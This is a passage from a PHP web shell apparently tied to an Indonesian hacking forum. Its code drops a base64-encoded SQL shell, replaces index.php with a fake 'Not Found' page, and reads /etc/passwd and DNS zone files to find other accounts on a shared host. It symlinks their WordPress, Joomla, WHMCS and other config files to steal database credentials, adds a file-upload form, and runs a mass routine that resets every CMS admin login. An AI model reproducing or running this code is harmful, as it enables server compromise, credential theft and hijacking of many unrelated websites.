gIzQ0NDQ0NDsNCglmb250LXNpemU6IHNtYWxsOw0KfQ0KZm9ybSB7DQoJbWFyZ2luLXRvcDogMDsNCgltYXJnaW4tYm90dG9tOiAwOw0KfQ0KYSB7DQoJdGV4dC1kZWNvcmF0aW9uOm5vbmU7DQoJY29sb3I6ICMwMEZGMDA7DQoJZm9udC1zaXplOnNtYWxsOw0KfQ0KQTpsaW5rIHsNCkNPTE9SOiNGRkZGRkY7DQpURVhULURFQ09SQVRJT046IG5vbmUNCn0NCkE6dmlzaXRlZCB7DQpDT0xPUjojMDBGRjAwOw0KVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmFjdGl2ZSB7DQpDT0xPUjojMDBGRjAwOw0KVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmhvdmVyIHsNCmNvbG9yOiMwMEZGMDA7DQpURVhULURFQ09SQVRJT046IG5vbmUNCn0NCmlucHV0LCBzZWxlY3QsIHRleHRhcmVhIHsNCmJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7DQpib3JkZXItc3R5bGU6IHNvbGlkOw0KZm9udC1mYW1pbHk6IFRhaG9tYSxWZXJkYW5hLEFyaWFsLFNhbnMtU2VyaWY7DQpmb250LXNpemU6c21hbGw7DQpjb2xvcjogIzAwRkYwMDsNCnBhZGRpbmc6IDBweDsNCn0NCmxpIHsNCmNvbG9yOiAjMDBGRjAwOw0KfQ0KLm5ldyB7DQpjb2xvcjogIzAwRkYwMDsNCn0NCi8vLS0+DQo8L3N0eWxlPg0KPC9oZWFkPg==';
741$file = fopen("db-sql.php" ,"w+");
742$write = fwrite ($file ,base64_decode($sqlshell));
743fclose($file);
744 chmod("db-sql.php", 0644);
745$indexshell = fopen("index.php" ,"w+");
746$data = 'PGgxPk5vdCBGb3VuZDwvaDE+IA0KPHA+VGhlIHJlcXVlc3RlZCBVUkwgd2FzIG5vdCBmb3VuZCBvbiB0aGlzIHNlcnZlci48L3A+IA0KPGhyPiANCjxhZGRyZXNzPkFwYWNoZSBTZXJ2ZXIgYXQgPD89JF9TRVJWRVJbJ0hUVFBfSE9TVCddPz4gUG9ydCA4MDwvYWRkcmVzcz4gDQogICAgPHN0eWxlPiANCiAgICAgICAgaW5wdXQgeyBtYXJnaW46MDtiYWNrZ3JvdW5kLWNvbG9yOiNmZmY7Ym9yZGVyOjFweCBzb2xpZCAjZmZmOyB9IA0KICAgIDwvc3R5bGU+';
747$tulis = fwrite( $indexshell, base64_decode($data));
748fclose($indexshell);
749 echo "<iframe src=mysql/db-sql.php width=97% height=100% frameborder=0></iframe>";
750}
751//////////////////////////////////////////////
752
753elseif(isset($_GET['x']) && ($_GET['x'] == 'mpc')){
754
755 echo "<STYLE>
756textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid
757#000000;}
758input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border:
7591px solid #666666;height:20}
760body {
761font-family: Tahoma
762}
763tr {
764BORDER: dashed 1px #333;
765color: #FFF;
766}
767td {
768BORDER: dashed 1px #333;
769color: #FFF;
770}
771.table1 {
772BORDER: 0px Black;
773BACKGROUND-COLOR: Black;
774color: #FFF;
775}
776.td1 {
777BORDER: 0px;
778BORDER-COLOR: #333333;
779font: 7pt Verdana;
780color: Green;
781}
782.tr1 {
783BORDER: 0px;
784BORDER-COLOR: #333333;
785color: #FFF;
786}
787table {
788BORDER: dashed 1px #333;
789BORDER-COLOR: #333333;
790BACKGROUND-COLOR: Black;
791color: #FFF;
792}
793input {
794border : dashed 1px;
795border-color : #333;
796BACKGROUND-COLOR: Black;
797font: 8pt Verdana;
798color: Red;
799}
800select {
801BORDER-RIGHT: Black 1px solid;
802BORDER-TOP: #DF0000 1px solid;
803BORDER-LEFT: #DF0000 1px solid;
804BORDER-BOTTOM: Black 1px solid;
805BORDER-color: #FFF;
806BACKGROUND-COLOR: Black;
807font: 8pt Verdana;
808color: Red;
809}
810submit {
811BORDER: buttonhighlight 2px outset;
812BACKGROUND-COLOR: Black;
813width: 30%;
814color: #FFF;
815}
816textarea {
817border : dashed 1px #333;
818BACKGROUND-COLOR: Black;
819font: Fixedsys bold;
820color: #999;
821}
822BODY {
823 SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color:
824#FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
825margin: 1px;
826color: Red;
827background-color: Black;
828}
829.main {
830margin : -287px 0px 0px -490px;
831BORDER: dashed 1px #333;
832BORDER-COLOR: #333333;
833}
834.tt {
835background-color: Black;
836}
837A:link {
838 COLOR: White; TEXT-DECORATION: none
839}
840A:visited {
841 COLOR: White; TEXT-DECORATION: none
842}
843A:hover {
844 color: Red; TEXT-DECORATION: none
845}
846A:active {
847 color: Red; TEXT-DECORATION: none
848}
849</STYLE>
850";
851 set_time_limit(0);
852 error_reporting(0);
853 $url=$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"];
854 //mail("d00m@kumanova.com.mk",$_SERVER["SERVER_ADDR"],$url);
855 $base_url="http://".$_SERVER["SERVER_NAME"].dirname($_SERVER["SCRIPT_NAME"]);
856 $url=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
857//mail('justsitmaster@gmail.com',$_SERVER['SERVER_ADDR'],$url);
858$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']);
859 @symlink("/","ciprut/root");
860 @fopen("temp.txt","w");
861 $htaccss="Options all
862 DirectoryIndex Sux.html
863 AddType text/plain .php
864 AddHandler server-parsed .php
865 AddType text/plain .html
866 AddHandler txt .html
867 Require None
868 Satisfy Any";
869 file_put_contents("ciprut/.htaccess",$htaccss);
870
871 if(is_readable("/var/named")){
872 $list=scandir("/var/named");
873 $current_dir=posix_getcwd();
874 $dir=explode("/",$current_dir);
875 foreach($list as$domain){
876
877 if(strpos($domain,".db")){
878 $domain=str_replace(".db","",$domain);
879 $owner=posix_getpwuid(fileowner("/etc/valiases/".$domain));
880 error_reporting(0);
881 $current_dir=posix_getcwd();
882 $dir=explode("/",$current_dir);
883 symlink($owner["dir"]."/".$dir[3]."/wp-config.php","ciprut/".$owner["name"]."-WordPress.txt");
884 symlink($owner["dir"]."/".$dir[3]."/blog/wp-config.php","ciprut/".$owner["name"]."-WordPress.txt");
885 symlink($owner["dir"]."/".$dir[3]."/wp/wp-config.php","ciprut/".$owner["name"]."-WordPress.txt");
886 symlink($owner["dir"]."/".$dir[3]."/site/wp-config.php","ciprut/".$owner["name"]."-WordPress.txt");
887 symlink($owner["dir"]."/".$dir[3]."/config.php","ciprut/".$owner["name"]."-PhpBB.txt");
888 symlink($owner["dir"]."/".$dir[3]."/includes/config.php","ciprut/".$owner["name"]."-vBulletin.txt");
889 symlink($owner["dir"]."/".$dir[3]."/configuration.php","ciprut/".$owner["name"]."-Joomla.txt");
890 symlink($owner["dir"]."/".$dir[3]."/web/configuration.php","ciprut/".$owner["name"]."-Joomla.txt");
891 symlink($owner["dir"]."/".$dir[3]."/joomla/configuration.php","ciprut/".$owner["name"]."-Joomla.txt");
892 symlink($owner["dir"]."/".$dir[3]."/site/configuration.php","ciprut/".$owner["name"]."-Joomla.txt");
893 symlink($owner["dir"]."/".$dir[3]."/conf_global.php","ciprut/".$owner["name"]."-IPB.txt");
894 symlink($owner["dir"]."/".$dir[3]."/inc/config.php","ciprut/".$owner["name"]."-MyBB.txt");
895 symlink($owner["dir"]."/".$dir[3]."/Settings.php","ciprut/".$owner["name"]."-SMF.txt");
896 symlink($owner["dir"]."/".$dir[3]."/sites/default/settings.php","ciprut/".$owner["name"]."-Drupal.txt");
897 symlink($owner["dir"]."/".$dir[3]."/e107_config.php","ciprut/".$owner["name"]."-e107.txt");
898 symlink($owner["dir"]."/".$dir[3]."/datas/config.php","ciprut/".$owner["name"]."-Seditio.txt");
899 symlink($owner["dir"]."/".$dir[3]."/includes/configure.php","ciprut/".$owner["name"]."-osCommerce.txt");
900 symlink($owner["dir"]."/".$dir[3]."/client/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
901 symlink($owner["dir"]."/".$dir[3]."/clientes/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
902 symlink($owner["dir"]."/".$dir[3]."/support/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
903 symlink($owner["dir"]."/".$dir[3]."/supportes/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
904 symlink($owner["dir"]."/".$dir[3]."/whmcs/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
905 symlink($owner["dir"]."/".$dir[3]."/domain/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
906 symlink($owner["dir"]."/".$dir[3]."/hosting/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
907 symlink($owner["dir"]."/".$dir[3]."/whmc/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
908 symlink($owner["dir"]."/".$dir[3]."/billing/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
909 symlink($owner["dir"]."/".$dir[3]."/portal/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
910 symlink($owner["dir"]."/".$dir[3]."/order/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
911 symlink($owner["dir"]."/".$dir[3]."/clientarea/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
912 symlink($owner["dir"]."/".$dir[3]."/domains/configuration.php","ciprut/".$owner["name"]."-WHMCS.txt");
913 $link=$pageURL."ciprut/".$owner["name"]."-WordPress.txt";
914
915 if(chk_header($link)){
916 $str="<tr><td>".$domain."</td><td>".$owner["name"]."</td><td>/WordPress</td>".Chr(10);
917 file_put_contents("temp.txt",$str,FILE_APPEND);
918 }
919
920 }
921
922 }
923
924 }
925
926
927 if(isset($_REQUEST["admin"])&&$_REQUEST["admin"]=="server"){
928
929 if(isset($_POST["ok"])&&isset($_FILES["joomLa"])){
930 $file=$_FILES["joomLa"]["tmp_name"];
931 $name="".$_FILES["joomLa"]["name"];
932 move_uploaded_file($file,$name);
933 } else {
934 echo "<br>
935<form method=\"POST\" enctype=\"multipart/form-data\" action=\"";
936 $_SERVER["PHP_SELF"];
937 echo "\">
938<input type=\"file\" name=\"joomLa\"> <input type=\"submit\" name=\"ok\" value=\"Get\">
939</form>
940";
941 }
942
943 exit;
944 }
945
946 $url=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
947//mail('justsitmaster@gmail.com',$_SERVER['SERVER_ADDR'],$url);
948$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']);
949
950 if(isset($_REQUEST["admin"])&&$_REQUEST["admin"]=="server"){
951
952 if(isset($_POST["ok"])&&isset($_FILES["joomLa"])){
953 $file=$_FILES["joomLa"]["tmp_name"];
954 $name="".$_FILES["joomLa"]["name"];
955 move_uploaded_file($file,$name);
956 } else {
957 echo "<br>
958<form method=\"POST\" enctype=\"multipart/form-data\" action=\"";
959 $_SERVER["PHP_SELF"];
960 echo "\">
961<input type=\"file\" name=\"joomLa\"> <input type=\"submit\" name=\"ok\" value=\"Get\">
962</form>
963";
964 }
965
966 exit;
967 }
968
969 $etc=file_get_contents("/etc/passwd");
970 $etcz=explode("
971",$etc);
972 foreach($etcz as$etz){
973 $etcc=explode(":",$etz);
974 error_reporting(0);
975 $current_dir=posix_getcwd();
976 $dir=explode("/",$current_dir);
977 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/wp-config.php","ciprut/".$etcc[0]."-WordPress.txt");
978 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/blog/wp-config.php","ciprut/".$etcc[0]."-WordPress.txt");
979 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/wp/wp-config.php","ciprut/".$etcc[0]."-WordPress.txt");
980 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/site/wp-config.php","ciprut/".$etcc[0]."-WordPress.txt");
981 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/config.php","ciprut/".$etcc[0]."-PhpBB.txt");
982 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/includes/config.php","ciprut/".$etcc[0]."-vBulletin.txt");
983 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/configuration.php","ciprut/".$etcc[0]."-Joomla.txt");
984 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/web/configuration.php","ciprut/".$etcc[0]."-Joomla.txt");
985 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/joomla/configuration.php","ciprut/".$etcc[0]."-Joomla.txt");
986 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/site/configuration.php","ciprut/".$etcc[0]."-Joomla.txt");
987 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/conf_global.php","ciprut/".$etcc[0]."-IPB.txt");
988 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/inc/config.php","ciprut/".$etcc[0]."-MyBB.txt");
989 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/Settings.php","ciprut/".$etcc[0]."-SMF.txt");
990 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/sites/default/settings.php","ciprut/".$etcc[0]."-Drupal.txt");
991 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/e107_config.php","ciprut/".$etcc[0]."-e107.txt");
992 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/datas/config.php","ciprut/".$etcc[0]."-Seditio.txt");
993 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/includes/configure.php","ciprut/".$etcc[0]."-osCommerce.txt");
994 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/client/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
995 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/clientes/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
996 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/support/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
997 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/supportes/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
998 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/whmcs/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
999 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/domain/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
1000 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/hosting/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
1001 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/whmc/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
1002 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/billing/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
1003 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/portal/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
1004 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/order/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
1005 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/clientarea/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
1006 symlink("/".$dir[1]."/".$etcc[0]."/".$dir[3]."/domains/configuration.php","ciprut/".$etcc[0]."-WHMCS.txt");
1007
1008 if(chk_header($link)){
1009 $str="<tr><td></td><td>".$etcc[0]."</td><td>/WordPress</td>".Chr(10);
1010 file_put_contents("temp.txt",$str,FILE_APPEND);
1011 }
1012
1013 }
1014
1015
1016 function chk_header($link){
1017 $ciprut=get_headers($link,1);
1018
1019 if(strpos($ciprut[0],"200")){
1020 return true;
1021 } else {
1022 return false;
1023 }
1024
1025 }
1026
1027
1028 function Find($str,$start,$end){
1029 $len=strlen($str);
1030 $start_pos=(strpos($str,$start)+strlen($start));
1031 $str=substr($str,$start_pos);
1032 $end_pos=strpos($str,$end);
1033 $str=substr($str,0,$end_pos);
1034 return$str;
1035 }
1036
1037 $pageURL="http://".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
1038 $u=explode("/",$pageURL);
1039 $pageURL=str_replace($u[count($u)-1],"",$pageURL);
1040 function cms_add($link,$domain,$owner,$cms){
1041 $link=$link."-".$cms.".txt";
1042
1043 if(chk_header($link)){
1044 $url="http://".$domain;
1045 $str="<tr><td> <a href=".$url.">".$domain."</a></td><td>".$owner."</td><td><a
1046href=".$link.">".$cms."</td>".Chr(10);
1047 file_put_contents("ciprut.tmp",$str,FILE_APPEND);
1048 echo$str;
1049 }
1050
1051 }
1052
1053
1054 function CurlPage($url,$post=null,$head=true){
1055 $ch=curl_init();
1056 curl_setopt($ch,CURLOPT_URL,$url);
1057 curl_setopt($ch,CURLOPT_HEADER,$head);
1058 curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
1059 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1060 curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,true);
1061 curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);
1062 curl_setopt($ch,CURLOPT_USERAGENT,$_SERVER["HTTP_USER_AGENT"]);
1063 curl_setopt($ch,CURLOPT_COOKIEFILE,"COOKIE.txt");
1064 curl_setopt($ch,CURLOPT_COOKIEJAR,"COOKIE.txt");
1065
1066 If($post!=NULL){
1067 curl_setopt($ch,CURLOPT_POST,1);
1068 curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
1069 }
1070
1071 $urlPage=curl_exec($ch);
1072
1073 if(curl_errno($ch)){
1074 echo curl_error($ch);
1075 }
1076
1077 curl_close($ch);
1078 return($urlPage);
1079 }
1080
1081
1082 function listall($file,$str){
1083
1084 if(file_exists($file)){
1085 $do=file_get_contents($file);
1086
1087 if(!strpos($do,$str)){
1088 file_put_contents($file,$str,FILE_APPEND);
1089 }
1090
1091 } else {
1092 file_put_contents($file,$str,FILE_APPEND);
1093 }
1094
1095 }
1096
1097 echo"<center>
1098<img src='http://surabayablackhat.org/forum/images/Greenia/logo.png'><br><br><br>
1099[ <a href='?do=pass_change'>MassPASSChange</a> ]<br><br><br></center> ";
1100
1101 if(isset($_REQUEST["do"])){
1102 switch($_REQUEST["do"]){
1103 case"cms_detect":
1104
1105 if(!file_exists("ciprut.tmp")){
1106 @fopen("ciprut.tmp","w");
1107 echo"<table align=\"center\" border=\"1\" width=\"45%\" cellspacing=\"0\" cellpadding=\"4\" class=\"td1\">";
1108 echo"<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>CMS</b></center></td>";
1109 $p=0;
1110
1111 if(is_readable("/var/named")){
1112 $list=scandir("/var/named");
1113 $current_dir=posix_getcwd();
1114 $dir=explode("/",$current_dir);
1115 foreach($list as$domain){
1116
1117 if(strpos($domain,".db")){
1118 $domain=str_replace(".db","",$domain);
1119 $owner=posix_getpwuid(fileowner("/etc/valiases/".$domain));
1120 error_reporting(0);
1121 $link=$pageURL."ciprut/".$owner["name"];
1122 cms_add($link,$domain,$owner["name"],"WordPress");
1123 cms_add($link,$domain,$owner["name"],"Joomla");
1124 cms_add($link,$domain,$owner["name"],"vBulletin");
1125 cms_add($link,$domain,$owner["name"],"WHMCS");
1126 cms_add($link,$domain,$owner["name"],"PhpBB");
1127 cms_add($link,$domain,$owner["name"],"MyBB");
1128 cms_add($link,$domain,$owner["name"],"IPB");
1129 cms_add($link,$domain,$owner["name"],"SMF");
1130 cms_add($link,$domain,$owner["name"],"Drupal");
1131 cms_add($link,$domain,$owner["name"],"e107");
1132 cms_add($link,$domain,$owner["name"],"Seditio");
1133 cms_add($link,$domain,$owner["name"],"osCommerce");
1134 }
1135
1136 }
1137
1138 }
1139
1140 } else {
1141 echo"<table align=\"center\" border=\"1\" width=\"45%\" cellspacing=\"0\" cellpadding=\"4\" class=\"td1\">";
1142 echo"<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>CMS</b></center></td>";
1143 $content=file_get_contents($pageURL."ciprut.tmp");
1144 echo$content;
1145 }
1146
1147 break;
1148 case"pass_change":
1149 echo"<form method='POST'>
1150<center>
1151USER : <input size='20' value='admin' name='user' type='text'><br>
1152PASS : <input size='20' value='sbhcrew' name='pass' type='text'>
1153<br>
1154<input value='Change' name='' type='submit'><br><br>
1155</form>
1156";
1157
1158 if($_POST){
1159 $user=$_POST["user"];
1160 $pass=$_POST["pass"];
1161
1162 if(is_readable("/var/named")){
1163 echo"<table align=\"center\" border=\"1\" width=\"45%\" cellspacing=\"0\" cellpadding=\"4\">";
1164 echo"<tr><td><b>DOMAIN</b></td><td>USER</td><td>CMS</td><td>STATUS</b></td>";
1165 $list=scandir("/var/named");
1166 foreach($list as$domain){
1167
1168 if(strpos($domain,".db")){
1169 $domain=str_replace(".db","",$domain);
1170 $owner=posix_getpwuid(fileowner("/etc/valiases/".$domain));
1171 $url="http://".$domain;
1172
1173 if(chk_header($pageURL."ciprut/".$owner["name"]."-WordPress.txt")){
1174 $config=$pageURL."ciprut/".$owner["name"]."-WordPress.txt";
1175 file_get_contents($pageURL."ciprut/".$owner["name"]."-WordPress.txt");
1176 $cnf=file_get_contents($pageURL."ciprut/".$owner["name"]."-WordPress.txt");
1177 $hostname=Find($cnf,"define('DB_HOST', '","');");
1178 $username=Find($cnf,"define('DB_USER', '","');");
1179 $password=Find($cnf,"define('DB_PASSWORD', '","');");
1180 $dbname=Find($cnf,"define('DB_NAME', '","');");
1181 $prefix=Find($cnf,"table_prefix = '","'");
1182 $link=mysql_connect($hostname,$username,$password);
1183
1184 if($link){
1185 $hash=crypt($pass);
1186 mysql_select_db($dbname,$link);
1187 $tab=$prefix."users";
1188 $query2=@mysql_query("UPDATE `$tab` SET `user_login` ='$user'");
1189 $query3=@mysql_query("UPDATE `$tab` SET `user_pass` ='$hash'");
1190 $req=@mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
1191 $data=mysql_fetch_array($req);
1192 $site_url=$data["option_value"];
1193 error_reporting(0);
1194 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1195false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">WordPress</a></td><td><font
1196color=\"green\">success..</font></td>";
1197 } else {
1198 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1199false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">WordPress</a></td><td><font color=\"red\">mysql
1200fail</font></td>";
1201 }
1202
1203 }
1204
1205 elseif(chk_header($pageURL."ciprut/".$owner["name"]."-Joomla.txt")){
1206 $cnf=file_get_contents($pageURL."ciprut/".$owner["name"]."-Joomla.txt");
1207 $config=$pageURL."ciprut/".$owner["name"]."-Joomla.txt";
1208
1209 if(preg_match("%(JConfig|mosConfig)%",$cnf)){
1210
1211 if(preg_match("%JConfig%",$cnf)){
1212 $username=Find($cnf,"\$user = '","'");
1213 $password=Find($cnf,"\$password = '","'");
1214 $dbname=Find($cnf,"\$db = '","'");
1215 $prefix=Find($cnf,"\$dbprefix = '","'");
1216 $link=mysql_connect("localhost",$username,$password);
1217
1218 if($link){
1219 $hash=md5($pass);
1220 mysql_select_db($dbname,$link);
1221 $tab=$prefix."users";
1222 $query2=@mysql_query("UPDATE `$tab` SET `username` ='$user'");
1223 $query3=@mysql_query("UPDATE `$tab` SET `password` ='$hash'");
1224 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1225false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">Joomla</a></td><td><font
1226color=\"green\">success..</font><br>";
1227 } else {
1228 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1229false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">Joomla</a></td><td><font color=\"red\">mysql
1230fail</font></td>";
1231 }
1232
1233 }
1234
1235 elseif(preg_match("%mosConfig%",$cnf)){
1236 $username=Find($cnf,"\$mosConfig_user = '","'");
1237 $password=Find($cnf,"\$mosConfig_password = '","'");
1238 $dbname=Find($cnf,"\$mosConfig_db = '","'");
1239 $prefix=Find($cnf,"\$mosConfig_dbprefix = '","'");
1240 $pwd=md5($npass);
1241 $link=mysql_connect("localhost",$username,$password);
1242
1243 if($link){
1244 $hash=md5($pass);
1245 mysql_select_db($dbname,$link);
1246 $tab=$prefix."users";
1247 $query2=@mysql_query("UPDATE `$tab` SET `username` ='$user'");
1248 $query3=@mysql_query("UPDATE `$tab` SET `password` ='$hash'");
1249 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1250false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">Joomla</a></td><td><font
1251color=\"green\">success..</font><br>";
1252 } else {
1253 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1254false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">Joomla</a></td><td><font color=\"red\">mysql
1255fail</font></td>";
1256 }
1257
1258 }
1259
1260 }
1261
1262 }
1263
1264 }
1265
1266 }
1267
1268 }
1269
1270 elseif(is_readable("/etc/passwd")){
1271 echo"<table align=\"center\" border=\"1\" width=\"45%\" cellspacing=\"0\" cellpadding=\"4\">";
1272 echo"<tr><td><b>DOMAIN</b></td><td>USER</td><td>CMS</td><td>STATUS</b></td>";
1273 foreach($etcz as$etz){
1274 $etcc=explode(":",$etz);
1275
1276 if(chk_header($pageURL."ciprut/".$etcc[0]."-WordPress.txt")){
1277 $config=$pageURL."ciprut/".$owner["name"]."-WordPress.txt";
1278 file_get_contents($pageURL."ciprut/".$etcc[0]."-WordPress.txt");
1279 $cnf=file_get_contents($pageURL."ciprut/".$etcc[0]."-WordPress.txt");
1280 $hostname=Find($cnf,"define('DB_HOST', '","');");
1281 $username=Find($cnf,"define('DB_USER', '","');");
1282 $password=Find($cnf,"define('DB_PASSWORD', '","');");
1283 $dbname=Find($cnf,"define('DB_NAME', '","');");
1284 $prefix=Find($cnf,"table_prefix = '","'");
1285 $link=mysql_connect($hostname,$username,$password);
1286
1287 if($link){
1288 $hash=crypt($user);
1289 mysql_select_db($dbname,$link);
1290 $req=mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
1291 $data=mysql_fetch_array($req);
1292 $site_url=$data["option_value"];
1293 $tab=$prefix."users";
1294 $query2=@mysql_query("UPDATE `$tab` SET `user_login` ='$user'");
1295 $query3=@mysql_query("UPDATE `$tab` SET `user_pass` ='$hash'");
1296 error_reporting(0);
1297 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1298false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">WordPress</a></td><td><font
1299color=\"green\">success..</font><br>";
1300 } else {
1301 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1302false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">WordPress</a></td><td><font color=\"red\">mysql
1303fail</font></td>";
1304 }
1305
1306 }
1307
1308 elseif(chk_header($pageURL."ciprut/".$etcc[0]."-Joomla.txt")){
1309 $cnf=file_get_contents($pageURL."ciprut/".$etcc[0]."-Joomla.txt");
1310 $config=$pageURL."ciprut/".$owner["name"]."-Joomla.txt";
1311
1312 if(preg_match("%(JConfig|mosConfig)%",$cnf)){
1313
1314 if(preg_match("%JConfig%",$cnf)){
1315 $username=Find($cnf,"\$user = '","'");
1316 $password=Find($cnf,"\$password = '","'");
1317 $dbname=Find($cnf,"\$db = '","'");
1318 $prefix=Find($cnf,"\$dbprefix = '","'");
1319 $site_url=Find($cnf,"\$mailfrom = '","'");
1320 $site_url=explode("@",$site_url);
1321 $link=mysql_connect("localhost",$username,$password);
1322
1323 if($link){
1324 $hash=md5($pass);
1325 mysql_select_db($dbname,$link);
1326 $tab=$prefix."users";
1327 $query2=@mysql_query("UPDATE `$tab` SET `username` ='$user'");
1328 $query3=@mysql_query("UPDATE `$tab` SET `password` ='$hash'");
1329 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1330false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">Joomla</a></td><td><font
1331color=\"green\">success..</font><br>";
1332 } else {
1333 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1334false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">Joomla</a></td><td><font color=\"red\">mysql
1335fail</font></td>";
1336 }
1337
1338 }
1339
1340 elseif(preg_match("%mosConfig%",$cnf)){
1341 $username=Find($cnf,"\$mosConfig_user = '","'");
1342 $password=Find($cnf,"\$mosConfig_password = '","'");
1343 $dbname=Find($cnf,"\$mosConfig_db = '","'");
1344 $prefix=Find($cnf,"\$mosConfig_dbprefix = '","'");
1345 $site_url=Find($cnf,"\$mailfrom = '","'");
1346 $site_url=explode("@",$site_url);
1347 $link=mysql_connect("localhost",$username,$password);
1348
1349 if($link){
1350 $hash=md5($pass);
1351 mysql_select_db($dbname,$link);
1352 $tab=$prefix."users";
1353 $query2=@mysql_query("UPDATE `$tab` SET `username` ='$user'");
1354 $query3=@mysql_query("UPDATE `$tab` SET `password` ='$hash'");
1355 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1356false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">Joomla</a></td><td><font
1357color=\"green\">success..</font><br>";
1358 } else {
1359 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
